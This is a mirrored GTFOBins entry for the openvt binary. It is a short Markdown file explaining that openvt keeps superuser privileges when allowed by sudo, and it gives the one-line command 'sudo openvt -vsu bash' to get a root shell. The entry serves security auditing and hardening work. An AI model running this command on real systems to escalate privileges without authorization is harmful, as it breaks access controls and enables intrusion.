mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 15:59:17 +01:00
8 lines
268 B
Markdown
8 lines
268 B
Markdown
|
---
|
||
|
functions:
|
||
|
sudo:
|
||
|
- description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
|
||
|
code: |
|
||
|
sudo openvt -vsu bash
|
||
|
---
|